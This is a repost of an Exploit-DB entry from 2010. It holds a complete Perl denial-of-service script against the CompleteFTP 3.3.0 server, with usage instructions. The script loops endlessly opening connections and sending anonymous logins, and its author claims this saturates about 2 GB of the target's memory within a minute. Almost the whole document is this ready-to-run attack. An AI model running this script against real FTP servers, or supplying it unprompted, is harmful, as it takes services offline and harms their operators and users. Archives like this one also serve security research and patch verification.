CompleteFTP 3.3.0 – Remote Memory Consumption Denial of Service - 体验盒子

作者： Jonathan Salwan

日期： 2010-04-08

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/12110/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

#!/usr/bin/perl

#

# Title: CompleteFTP v3.3.0 - Remote Memory Consumption DoS

# Author:Jonathan Salwan <submit(!)shell-storm.org>

# Web: http://www.shell-storm.org

#

# ~60 sec for satured ~2Go RAM

#

use IO::Socket;

print "\n[x]CompleteFTP v3.3.0 - Remote Memory Consumption DoS\n";

if (@ARGV < 1)

{

print "[-] Usage: <file.pl> <host> <port>\n";

print "[-] Exemple: file.pl 127.0.0.1 21\n\n";

exit;

}

$ip = $ARGV[0];

$port = $ARGV[1];

$login = "USER anonymous\r\n";

$pwd = "PASS anonymous\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";

print "Please Wait...\n";

while(){

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port");

$socket->recv($answer,2048);

$socket->send($login);

$socket->send($pwd);

}